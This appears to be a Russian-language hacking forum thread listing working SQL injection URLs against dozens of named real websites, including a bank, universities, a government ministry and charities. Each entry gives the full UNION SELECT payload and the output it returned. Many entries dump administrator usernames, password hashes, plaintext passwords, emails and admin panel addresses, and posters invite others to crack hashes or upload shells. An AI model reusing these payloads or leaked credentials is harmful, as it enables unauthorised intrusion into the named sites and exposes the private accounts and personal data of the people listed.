Database Version: 4.0.27-standard-log
Database name: db199351466
User name: dbo199351466@74.208.16.162

http://www.4baby.com.ua/index.php?id=-6373+union+select+concat_ws(0x0b,us er(),database(),versi on())


dbuser@localhost
ababycom_4baby
4.1.22-log

http://www.catalogs.ohio.edu/preview_entity.php?catoid=4&ent_oid=-199+union+select+1,version(),3,4,5,6,7,8,9/*

4.1.22-log

http://www.seruven.org/haber.php?id=-1/**/union/**/select/**/0,version(),database(),yazar,4,5%20from%20seruven/*

seruvenorg@77.92.153.64
4.0.27-log

http://www.visions.ab.ca/display.php?id=-18+union+select+1,2,3

Database Version: 5.0.67
Database name: wordpress_visions_ab_ca
User name: visionsabc387943@64.29.146.101

ТИЦ: 100
PR: 4

http://www.santo.kz/modules.php?id=-1'+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user())/*

4.0.18-nt:santo:mysanto@localhost

AS "SMP Bank"
http://www.multibanka.ru/rus/news/?id=-38'+union+select+1,2,3,4,5,6,concat_ws(0x3a,databa se(),user(),version()),8,9,10,11,12+--+
multibankalv:root@localhost:5.0.75

http://www.multibanka.ru/rus/news/?id=-38'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,p assword,host),8,9,10,11,12+from+mysql.user+--+
root::localhost
nagios:*82802C50A7A5CDFDEA2653A1503FC4B8939C4047:c trl-03.mbint.multibanka.com
itd-02:*DF4EA3C83AF5CE947137A411CE429A98F48DF5DB:itd-02.mbint.multibanka.com
pavel:*B7B226482D498A9332C576AFD91B702B57C1069E:lo calhost
external-sql:*91C46317B0053BE203105DD885E9B0B73B4E0C43:

Регламент-Издательский дом
http://www.reglament.net/about/?-info'/**/union/**/select/**/1,2,3,4,5,6,concat_ws(0x3a,database(),user(),versi on()),8,9,10/*
amir:amir@zvm17.host.ru:4.0.27-log

http://www.firework.kz/longnews.php?id=1+union+select+1,2,3,concat_ws(0x3 a,version() ,database(),user())--

5.0.77-log:firework_pyros:firework_PYr0mAn@localhost

tables:
cnt

data

menu

news

posts

topics

users

до хрена юзеров, но сайт ватный ))

http://www.firework.kz/longnew s.php?id=1+union+select+1,2,3,concat_ws(0x3a,id,ni ck,pass,rank,fio, mail,tel)+from+users--

admin:

1:admin:adW0rk:admin:Администратор:ad min@firework.kz:+7 727 2421216

http://www.remix07boston.com/articles.php?categid=568828&articid=-568844818+union+select+1,group_concat(strLogin,cha r(58),strPassword,char(58),AccountType),3,4,5,6+fr om+tblaccount--

http://www.duelofages.com/history/character.php?ID=1
phpDOA@localhost:DOA:3.23.58
Blind...

http://web.xnet.kz/info.php?id=-1+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51--

xnetkz_xnet:xnetkz_xnetuser@localhost:5.0.75-log


users:


http://web.xnet.kz./info.php?id=-1+unio n+select+1,group_concat(concat_ws(0x3a,login,pass _md5)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51+fro m+clients+limit+0,1--

http://www.top10cartoons.com/character.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16
dbo241580350@74.208.16.173:db241580350:4.0.27-max-log

ТИЦ: 90
PR: 5

http://www.dknews.kz/toplink.php?id=1+union+select+1,concat_ws(0x3a,dat abase(),user(),version()),3,4,5--

dknewsk_manat:dknewsk_new@localhost:5.0.67-community

######################################

http://www.fomin.kz/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),u ser(),ve rsion()),5,6,7,8,9--

fominkz_fomin:fominkz_admin@localhost:5.0.75-log

http://www.ergoproxy.ru/character.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version())proxy@localhost:proxy:5.0.77

ТИЦ: 30
PR: 4

http://www.fbs-rk.kz/index_r.php?id=-1+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4--

db_fbs:us_fbs@localhost:4.1.22-standard

http://www.os-forum.com/minix/net/code-display.php?filenameid=88/**/UNION/**/SELECT/**/1

Database Version: 4.0.27-max-log
Database name: minix
User name: minix@208.109.78.134

http://www.ralstonrealestate.com/display.php?action=listing_detail&PID=12/**/UNION/**/SELECT/**/1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18

Database Version: 4.0.27-max-log
Database name: rrweb
User name: rrweb@208.109.14.136

http://www.stom-d.kz/link.php?id=-1+union+select+concat_ws(0x3a,database(),user(),ve rsion()),2,3,4--&rz=z


goldflou_stomed:goldflou_goldflo@localhost:5.0.75-log

http://boothextrusions.com/display.php?pID=8/**/UNION/**/SELECT/**/1,Version(),3/**/LIMIT/**/1,1/*

Database Version: 4.1.22-standard
Database name: booth_booth
User name: booth_booth@localhost

http://www.vegetables.co.nz/vegetable.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11dcom@ws7.int.mydns.n et.nz:dcom_vegfed:4.0.27-standard-log

http://www.lawguru.com/cgi/bbs/user/faq.cgi?id=-117+union+select+1,2,3,4,5,6,group_concat(username ,char(58),password,char(58),email),8,9,10,11+from+ emesgUsers/*
mitzi:3aZR9CRL:debmin96@hotmail.com

http://www.lawguru.com/cgi/bbs/user/faq.cgi?id=-117+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,admi nid,password),8,9,10,11+from+admin/*
admin::beatall123

Если кто найдёт админку- плиз напишите в ПМ.

http://www.dsni.co.uk/eventdetails.php?id=-313'+union+select+1,table_name,3,4,5,6,7,8+from+in formation_schema.tables+--+

http://www.sglaw.com/employment_law.php?pid=6/**/UNION/**/SELECT/**/1,2,3,4/**/LIMIT/**/1,1/*

Database Version: 5.0.32-Debian_7etch6-log
Database name: sglaw
User name: timferrell@web2.msomt.modwest.com

http://www.dsni.co.uk/eventdetails.php?id=312'+union+select+1,table_name ,3,4,5,6,7,8+from+information_schema.tables+--+
Таблиц с юзерами нет(

http://pulsradio.ru/modules/_reklama/index.php?sub&id=-1+union+select+1,version()#

5.0.67-community-log

стоят фильтры)

#####################################
"МИНИСТЕРСТВО СВЯЗИ И ИНФОРМАТИЗАЦИИ РЕСПУБЛИКИ БЕЛАРУСЬ"

ТИЦ: 170
PR: 7


http://www.mpt.gov.by/new/modules/de livsp/index.php?sub&id=1+unio n+select+1,versi on()

4.1.22

ОПЯТЬ ФИЛЬТРЫ)))

ПР7
http://www.allgame.com/character.php?id=1704'+union+select+1,concat(user, char(58),password),3,4+from+mysql.user+--+
root *25F49005CFA966D47EFBF9A8FFE15F72A8352AAA

http://www.allgame.com/character.php?id=1704'+union+select+unhex(hex(tabl e_name)),2,3,4+from+information_schema.tables+limi t+128,1000+--+
Полезных табл не нашёл(

PR: 3
http://aven-tour.ru/plus/index.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5

5.1.32-community-log:aventou_aven:aventou_aven@91.195.124.9

http://central-jkt.sch.id/detail_news.php?id=-31+union+select+1,concat(IDUser,char(58),UserID,ch ar(58),UserPassword),3,4,5+from+tbl_admin/*

1:websekolah:068b89878cc7a5518beb601ee1c7c7d1

http://allo-mebel.ru/shop/?dir=62+union+select+1,2,3, 4,5,6,7,8,9/*


Database Version: 4.1.22
Database name: allo_mebel_ru
User name: allo-mebel_mysql@212.193.233.212

Powered by Smoothflash SQL injection


http://www.gregperkins.com/smoothflash/admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users

kc9ghz:5a31b9d36acbc873dd1d4f1583abc348
???

http://www.hellados.ru/pic.php?id=1
user():database():version()
hellados@zvm18.host.ru:hellados:3.23.58
Blind...

ТИЦ: 170
PR: 5

http://museum.pereslavl.ru/event.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8/*

5.0.32-Debian_7etch5-log:pzmuseum:pzmuseum@localhost

http://iiichan.net/index.php?post=1242184682+and+substring(version(), 1,1)=5--
version 5.0.67-log
user humblefool

http://www.ksou.com.cn/news/cat.php?id=-39+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3--&language=1
4.0.26-standard:msearch:ksou@localhost PR5

_http://sideko.ru/index.php?categ=-74+union+select+111,concat_ws(0x3a,version(),datab ase(),user()),3--&parent=61'&p=shop&navop=61'&area=1&sort=time_desc

5.0.22:admin_sidb:admin_sidb@localhost

инфу можно просмотреть в исходнике страници, в теге


<title>SIDEKO.RU - ротанг и высококачественная плетеная мебель из ротанга в розницу, оптом и на заказ. Мягкая плетеная мебель из ротанга. :: Магазин*»**»*5.0.22:admin_sidb:admin_sidb @localhost</title>

_http://sideko.ru/index.php?categ=-74+union+select+111,concat_ws(0x3a,name,uname,emai l,pass),3+from+kpro_user--&parent=61'&p=shop&navop=61'&area=1&sort=time_desc

Администратор:Administrator:eshop@sid eko.ru:adc2db1bff610b3d8273936236558883

http://smgroup.kz/index.php?opt=main&id=-1+union+ select+1,2,version() ,4,5 --

5.0.67-community

tables:news,users,admin,answers,menu

http://smgroup.kz/index.php?opt=main&id=-1+unio n+select+1,2,group_concat(concat_ws(0x3a,login, parol)),4,5+fr om+admin--

admin:pass
admin:1234

_http://www.restoran27.ru/?a=articles_full&id=-479+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3+--
5.0.77:restoran27:restoran27@localhost


_http://www.restoran27.ru/?a=articles_full&id=-479+union+select+1,concat_ws(0x3a,login,pass),3+fr om+users+limit+0,1--
Rem-x:38166fa5a6b227dd6b4a7cb415095520

hash:260280

[PR 3]
http://www.ultramarine.com.ua/info.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())
4.1.22-log:ultramar:u_redact@localhost

mssql-inj

[PR 5]
http://www.sparkle.com.tw/product.asp?id=94+or+1=@@version--
http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+db_name())--
http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+system_user)--
http://www.sparkle.com.tw/product.asp?id=94+or+1=(select+top+1+table_name+fr om+information_schema.tables)--

[PR 4]
http://www.thinklogical.com/product.asp?ID=49+or+1=@@version--
http://www.thinklogical.com/product.asp?ID=49+or+1=(select+db_name())--
http://www.thinklogical.com/product.asp?ID=49+or+1=(select+system_user)--
http://www.thinklogical.com/product.asp?ID=49+or+1=(select+top+1+table_name+fr om+information_schema.tables)--

Еда пр4
http://zone.missouri.edu/schedule.php?semester=Fall&year=-2008+union+select+1,2,3,4,5,concat_ws(0x3a3a,usern ame,password,level),7,8,9,10,11,12,13,14+from+admi n+/*+

tmeans::pass::0
zone_mentors::zonefolks::0

http://zone.missouri.edu/Admin/

http://career.mgimo.ru/external/events/partner.php?act=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

<<Бизнес портaл новосибирска>>
http://www.novosib.ru/market/offer.php?id=-2579+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),0 ,1,2,3,4,5--+

4.1.22-log:novosib8_mamba:novosib8_sgv@localhost:portbld-freebsd6.1

http://www.organicavenue.com/products/news.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,database(),user(),7,8,9,10 from products/*

products
denisemari@localhost


http://www.hardwarehaber.com/haberbak.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,database(),7,user(),version(),10,11,12,1 3,14,15,16/*

hardwarehaber
root@localhost
5.0.32-Debian_7etch3-log



http://www.aysu.de/haber.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,database(),7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,user(),24,25,26,27,28,29/*

dbaysu_1
aysu@localhost

Газета юрист.
PR - 5

user() - u74105@10.10.223.75
database() - u74105_yur
version() - 5.0.67-log
@@version_compile_os - unknown-freebsd6.3

http://www.gazeta-yurist.ru/article.php?i=-397+union+select+version(),user(),3,4,5,6++--

Еда ПР6
http://www.sierranevada.edu/pictures/photo/?aid=-191'+union+select+1,2,3,concat(username,char(58),p assword),5,6,7+from+usr+--+&index=2
rstriffler:16908b0605f2645dfcb4c3a8d248cef3:80 - events
CindyM:bccef78390596a8a3069b548b9c9214f:32 - incline
SchuylerH:bccef78390596a8a3069b548b9c9214f:33 - incline
.....................

Морские сражения

http://navyfield.ru/index.php?page_id=1'+or+1=@@version--

http://navyfield.ru/index.php?page_id=1'+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+N OT+IN+('phpbb_bots'))--

Нету дампера mssql... вот и лениво:(

ЗЫ: Чувствую,что это такой боян,что ппц...

http://www.foodplus.ae/menu.php?id=1+union+select+1,concat_ws(0x3a,versio n(),datab ase(),u ser()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27--

5.0.75-community-log:fanzplus_foodplus:fanzplus_foodp@localhost

P.S что то я найти таблы не могу =\

---------------------------------------------------------------------------
PR: 3

http://www.ae-concrete.com/productchar.php?id=-1+union+select+concat_ws(0x3a,ve rsion(),database(),us er()),2--

4.1.22-standard:db_aeconcrete:db_aeconcrete_97@localhost

----------------------------------------------------------------------------
PR: 5

http://www.go-green.ae/link.php?id=1+union +select+1,2,3,concat_ ws(0x3a,version(),database(),us er()),5,6,7/*

4.1.21:gogreen:gogreen@localhost


-----------------------------------------------------------------------------


http://www.huda-shipping.ae/dynamic.php?id=-1+union+select+1,concat_ws(0x 3a,version(),databas e(),user()),3--

5.0.67-community-log:huda_houda:huda_userhuda@localhost



http://www.huda-shipping.ae/dynamic.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,Admin _ID,Admin_Nam e,User _Name,P as sword,Email)),3+from+admin+limit+0,1--


admin :
1:Administrator:h uda123:huda_123:b assam@dowgroup.com

http://www.safariclub.ru/field.php?action=view&id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13--&status=1
netsoft@localhost:netsoft_safari:5.0.45

PR: 4
тИЦ: 100


http://www.patrioty.info/field.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4--
patrioty_patriot@localhost:patrioty_paintball:5.0. 67-community

http://www.patrioty.info/field.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,passwor d),4+from+users_cp--
10:admin:dfer54

http://patrioty.info/admin/ - админка. Шелл льётся =)

ПР6
http://nccsdataweb.urban.org/faq/detail.php?linkID=-805+union+select+1,2,user,password,5,6,7,8,9,10,11 ,12,13+from+mysql.user+limit+1,1/*&category=9
jdurnford::1030bc2d72167683

http://www.avalonmicro.ca/products/index.php?Category=-6+union+select+table_name+from+information_schema. tables+--+
user_registration

http://www.amprofon.com.mx/noticias.php?id=-12+union+select+1,2,user,4+from+usuarios--
apcmmexico

Joomla com_akogallery

http://www.kaminfeger.com/index.php?option=com_akogallery&Itemid=51index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,concat(0x3a,username)/**/from/**/mos_users/*

admin c564660bacebedf0e02d3a409f29cd5b ??????


http://www.wenatcheecares.org/user.php?id=-14+union+select+1,2,3,4,concat_ws(0x3a,user_nickna me,user_passwd),6,7,8,9,10,11+from+users

Pastor Andrew:547d4e455674d06bd4d40475796f6944 pass : wencares

http://www.wenatcheecares.org/login.php

http://marbag.ae/index.php?id=-1'+union+select+1,concat_ws( 0x3a,version(),da tabase(),user()),3/*&lang=ru

5.0.27:marbag:mbae-mysql@localhost

########################################

http://www.aestockholm.se/ae.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa s e(),use r()),4,5/*

5.0.45-log:bungy_se:bungy_se@b7593@s73.loopia.se


http://www.aestockholm.se/ae.php?id=-1+union+se lect+1,2,group_concat(concat_ws(0x3a,id,user,pass) ),4,5+from+login+li mit+0,1/*

admin:
1:bungeelocos:pitepalt
2:jp:pansarpung

http://www.aestockholm.se/admin/

http://www.gradschool.cornell.edu/index.php?p=-1+union+select+1,2,3,4,5,concat_ws(version(),datab ase(),user()),7,8,9,10,11,12--

http://www.digischool.nl/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--

Fred Capel-240430a0ea35050f1dea47d2a13d3be4 ???

admin panel

http://www.digischool.nl/gcards/login.php

http://www.er.com.my/Content.php?id=1+union+select+concat_ws(0x3a,versi on(),database(),user()),2,3,4/*

4.1.22-standard-log:excellent_dat:excellent_root@localhost

ПР5
http://colesfrenchdip.com/ecard/getnewsitem.php?newsid=-10+union+select+1,2,version(),4,5/*
4.1.20

http://lnx.rosadesign.net/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat_W s(0x3a3a,userid,username,userpass,email),4,5+from+ gc_cardusers--
1::admin::08cd706ca61375c02a47b6ea26c66aba::email

http://www.yosy.nl/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat_W s(0x3a3a,userid,username,userpass,email),4,5+from+ gc_cardusers--
4::admin::21232f297a57a5a743894a0e4a801fc3::email

http://www.npac.org.hk/ecards/getnewsitem.php?newsid=1+union+select+1,2,concat_W s(0x3a3a,userid,username,userpass,email),4,5+from+ gc_cardusers--
1::admin::42c533c57a1cde61c47fe293e72beea3::sysadm in@npac.org.hk - npnimda7

http://www.er-ekeksiogluinsaat.com/ru/urunic.php?id=1'+union+select+1,2,concat_ws(0x3a,v ersion(),database(),user()),4,5,6,7/*

4.1.22:ereksiru:ereksiru@localhost


#####################################
PR: 4

http://www.opendoors.nl/content/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16, conca t_ws(0x3a,version(),database(),user()),18,19,20,21 ,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47--&isocodeselect=er

5.0.32-Debian_7etch8-log:dbcmsnl:nlsu@nas01

<<Энциклопедия вина>>
http://www.shai.dp.ua/enciclopedia/index.php?GID=-12+union+select+1,2,concat_ws(0x3a2a3a,version(),d atabase(),user(),@@version_compile_os),4,5,6,7,8,9 ,0,1/*
5.0.32-Debian_7etch5-log:*:shai:*:shai@localhost:*:pc-linux-gnu

PR: 5

http://www.infopal.it/pagine.php?id=1'+union+select+1,concat_ws(0x3a,ver sion(),database(),user(),@@version_compile_os),3/*

4.1.20:infopal:infopal@localhost:redhat-linux-gnu

@@version_compile_os - актуальНо писать?

http://rebeccaallen.com/v2/work/work.php?ID=1+union+select+1,concat_ws(0x3a,user() ,database(),version()),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37--
rallen_user@localhost:rallen_db:5.0.45

PR4
http://www.codexpert.ro/stiri.php?stire=23+UNION+SELECT+1,convert(concat_w s(0x3a,version(),database(),user(),@@version_compi le_os)+using+latin1),3,4,5--


Database Version: 5.0.67-community
Database name: rcod5157_main
User name: rcod5157_cilu@localhost
Os: redhat-linux-gnu

таблички выводятся все сразу...
http://www.codexpert.ro/stiri.php?stire=23+UNION+SELECT+1,convert(TABLE_NA ME+using+latin1),3,4,5+FROM+INFORMATION_SCHEMA.TAB LES--

PR: 5

http://www.euro2009.it/service_page.php?Id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(), datab ase(), user(), @@version_compile_os),7,8,9,10,11,12,13,14,15,16--

5.0.32-Debian_7etch8-log:euro2009:euro2009@localhost:pc-linux-gnu


http://www.euro2009.it/service_page.php?Id=-1+union+select+1,2,3,4,group_concat(concat_ws(0x3a ,Login,Pa ssword )),6,7,8,9,10,11,12,13,14,15,16+from+A ccount+limit+0,1--


blob:ceb6e01b385ce23118d4c3f618ccdfd7,makeda:2870f 1453bd6f8e084af96b415530aba,sardox:2cb1bf043ff1f53 f5d65389151294995,roberto:b47de98a3ec0d29b86e24613 30fe2697,pamela:383d2e939b1926fbdcb6f8e4e5e66fd0,m aura:b606578566756b27cf956f48ab5e69e6,carmen:b47de 98a3ec0d29b86e2461330fe2697,s:,brujo:9f9bb489c4d76 c2c50e9eca273d61d83

################################################## #

http://www.abcdtv.it/pagina.php?id=-1+union+sele ct+1,2,3,concat_ws(0x3a,version(),databa se(),user (),@@version_compile_os),5,6,7--

4.1.22:abcdtv01:abcdtv01@localhost:portbld-freebsd6.2

ПР8
http://web.iyte.edu.tr/mechweb/research_areas/publications.php?id=-5+union+select+version()+from+information_schema.t ables+/*+
5.0.45
Если кто дальше прокопает - пишите в пм

ТИЦ: 80
PR: 4

http://www.color-it.net/news.php?id=111111+union+select+1,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),3 ,4,5,6,7--

4.1.22-log:wwwant_hostnet_colorit:anthost@localhost:portb ld-freebsd6.2

###########################################

PR: 4

http://www.itemweb.it/index.php?load=work&id=-1'+union+select+1,2,con cat_ws(0x3a,version(),database(), user(),@@version_compile_os),4,5,6,7,8,9,10,11,12, 13/*&lang=en

5.0.32-Debian_7etch6-log:item:item@localhost:pc-linux-gnu

###########################################
PR: 3

http://www.teatrodelsuono.it/equipe.php?ID=-1+union+select+1,2,concat_ws(0x3a,version(),databa s e(),us er(),@@version_c ompile_os),4,5,6,7,8,9--

5.0.51a-3ubuntu5.4:teatro:web@localhost:debian-linux-gnu

tables true : t_admins
P.S. крутите сами

#######################################
PR: 5

http://www.tass-it.ru/index.php?page=contacts&id=-1+union+select+1,versio n(),3,4--

5.0.67

tables:
columns_priv,time_zone_name,procs_priv,help_relati on,db,time_zone_transition,tables_priv,help_topic, func,time_zone_transition_type,time_zone,host,help _category,user,time_zone_leap_second,proc,help_key word

###########################################
PR: 4

http://datahop.it/item_details.php?id=1+union+sele ct+1,2,concat_ws(0x3a,version(),database(),use r(),@@version_compile_os),4,5,6,7,8,9,10/*

4.0.20-Max:datahop:datahopuserphp@www.datahop.net:pc-linux


P.S. ЧЕЛОВЕК- ЭТО ЕСТЬ ОДНА БОЛЬШАЯ SQL'Я У БОГА (C)


########################################
PR: 3

http://www.altesino.it./en/vino.php?id=-1'+u nion+select+1,2,3,group_concat(table_name),group_c o ncat(table_name),6,7,8+from+information_sc hema.tables+group+by+table_schema+limit+1,1/*

5.0.37-community-nt:altesino:altesino@localhost:Win32

tables:
sessioni,testi,distributori,vini,utenti,news,premi

P.S. ЖИЗНЬ КАК ИНТЕРНЕТ-ИНОГДА ЛАГАЕТ (C)

#########################################
http://www.intelli-it.de/intelli_it.php?id=-1+union+se lect+1,2,3,concat_ws(0x3a,versio n(),databas e(),user(),@@version_compile_os)--&lang=en

5.0.32-Debian_7etch10-log:intelli_itde:intelli_itde@localhost:pc-linux-gnu

#########################################
PR: 3

http://www.allacortedelvino.it/dettnews.php?id=-1'+union+select+1,2,concat_ws(0x3a ,version(),database(),use r(),@@version_c ompile_os),4,5,6,7,8,9,10,11/*

5.0.27:allacortedelvino-it:allacortedelvino@localhost:redhat-linux-gnu

#########################################
PR: 4

http://www.sprint-it.com/index.php?action=trainer&id=111111111'+union +select+1,2,3,concat_ws(0x3a,version(),database(), use r(),@@version_com pile_os),5,6,7,8,9,10,11,12,13/*

5.0.45-log:0030_scrumeducations:0030d001@baerentatze.25th-floor.com:redhat-linux-gnu

########################################
PR: 3

http://www.lupotto.it/descr_corso.php?id=-1+union+select+1,concat_ws(0x3a,version(), database(),us er(),@@version_compil e_os),3,4,5,6,7/*

4.1.23-pro-gpl-log:lupotto_it_site:GL5352_root@81.88.49.7:unknown-linux-gnu

#########################################
PR: 2

http://www.my-it.info/internetsme_section.php?id=-1+union+select+1,concat_ws(0x 3a,version(),database() ,user(),@@ version_compile_os),3,4--

5.0.51a-3ubuntu5.4-log:myit:myit@localhost:debian-linux-gnu

http://www.microbric.com {PR 5}
http://www.microbric.com/page.php?sId=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2/*

4.1.22-STANDARD : MICROBR_IBOT : MICROBR_IBOT@LOCALHOST

http://www.goldenstars.it/sk_stallone.php?id=-1+union+select+1,2,3,4,5,6,conca t_ws(0x3a,version(),database(),user(),@@version_co mpile_os),8 ,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52/*&lang=E

5.0.32-Debian_7etch10:web2_db1:web2_u1@localhost:pc-linux-gnu

#######################################

http://www.assure-it.co.uk/jobs.php?id=19+union+select+1,2,3,4,5,6,concat_ws( 0x3a,version(),da tabase(),user(),@@version_comp ile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23--

5.0.18-nt:assureit:assure-it@localhost:Win32

tables: users pages news jobs

#########################################

PR: 6

http://www.ispionline.it/eng/school.php?id=-1'+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6/*

4.0.14-standard-log:ispionline:ispi@localhost

#########################################
PR: 3

http://www.valiani.com/accessories_detail.php?ID=1+union+select+1,2,3,con cat_ ws(0x3a,vers ion(),database(),use r()),5,6,7--

4.1.22-standard-log:valiani_com_db1:AB15313_valcom@81.88.49.12


PR: 5

http://www.architetturadelmoderno.it/main.php?id=-1+union+select+1,2,3,4,5,6,7,versi on(),9,10,11,12 ,13--&lang=_eng

tables:stop_words,autori,sito_menu_nav,log_query,i ndicazioni_stradali,tipologie,comuni,sottotipologi e,nodi,info_nodo,tipologie_interventi,cronologie,s pecifiche,province,itinerari_speciali,utenti,crono logie_to_nodi_to_autori,specifiche_to_nodi,regioni ,itinerari_speciali_to_nodi,files

akk : utenti;

http://www.architetturadelmoderno.it/main.php?id=-1+un ion+select+1,2,3,4,5,6,7,group_concat(concat_ws(0x 3a,us er_id,p assword)),9,10,11,12,13+from+utenti+limit +0,1--&lang=_eng

Administrator:56NwZdcnJggYm741BcS8eTJ5ch5fWF0F5jbG W/shUdg=,cbertelli:RWwfUvS0Vz4J4kmjdv2O5+yMZtEAz7yiQ UpXTuyNXdk=,iguarino:tNABdYfYXBhMFkU9iu8rCH2vYSOYU k6gEFEeW3UOh3g=,rvecchiattini:j1M07vX2eDG0SkSG48wd xd8TlWeJu2tFBctp0ixxJuI=,lschiff:FJPd8Z6VLm+bh9Zip 3o1ZnaWR4cObBi1a0qAVmJnqFo=,lmolinari:FZs7j78yEo2U mTB7Npbxv52P5gWK9e+5neDG5NJwJxI=,edonati:oBAM9PZsK a53CmDJ/PhMt9KJri6+b5/muTqKgnp2OdU=,cpirotti:iJpn2f0itUhvFSHUn83dTWt5mVI EVsk7NgxmeLPvurU=,mballabio:pZ/v1Q47ByMXwj7t589b0+QFUk7LnbrenVfitHQOGNI=,epiccoli :9zyKyzx+tNzPCaWIGa8W7uDJSYDP+i7xT0e6ud5Sfiw= :( ????

http://www.architetturadelmoderno.it/admin/

http://www.neiljenkins.com/opera.php?op=-1'+union+select+1,2,3,concat_ws(0x3a3a,id,password ,email,level),5,6,7+from+users+--+&id=opera1

http://www.enrd.org/publications.php?id=-3+union+select+1,2,concat_Ws(0x3a3a,tcuser,tcpass, email,tcid,tcname),4,5,6,7+from+tbltelecenter--
rajukhanal::rainakhanal::mahabir@gmail.com::1::Gho repani Telecenter

Pagerank: 5
http://www.radiobucuresti.ro/stire.php?id=-631+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7


Database Version: 5.0.67-log
Database name: rb2
User name: rb@localhost
Os: slackware-linux-gnu

http://www.scenic-circle.co.nz/hotel.asp?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98, 99,100,101,102,103,104+from+news

Microsoft JET Database Engine

Кто сбрутит таблы какие-нить кроме news и Hotels, отпишитесь :)

www.ltefdonations.org

http://www.ltefdonations.org/user.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7

Версия - 5.0.75-community-log
Юзер - ltefdona_collect@localhost
БД - ltefdona_collector

Юзеры (всего 93):

http://www.ltefdonations.org/user.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,username,pa ssword,email),6,7+from+users+limit+1,1

Админка:
http://ltefdonations.org/admin/index.php

Name:minznerjosh
Pass:gateway400

http://www.billiard-service.ru/lamp.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9h2artif_d123456@www1.100mb .ru:h2artif_saites:5.0.45-community-log

PR: 6
amenez.phpnet.org
http://amenez.phpnet.org/Kam/volcano.php?id=11+union+select+1,concat_ws(0x3a,us er(),database(),version()),3,4,5,6,7
amenez2@10.0.0.84:amenez2:4.1.22-log

http://chocoisland.ru/chocolate.php?id=11+and+null+union+select+1,2,3,4, concat_ws(0x3a,user(),database(),version())
z92680_site@77.221.130.21:z92680_site:5.0.32-Debian_7etch6-log

onixvisn10.com

http://onixvisn10.com/user.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11

Версия - 5 5.0.67-community-log
Юзер - onixvisn_stfr1@localhost
БД - onixvisn_stfr1

Юзеры:

http://onixvisn10.com/user.php?id=-12+union+select+1,2,3,4,5,concat_ws(0x3a,User_nick name,user_passwd,user_email),7,8,9,10,11+from+user s

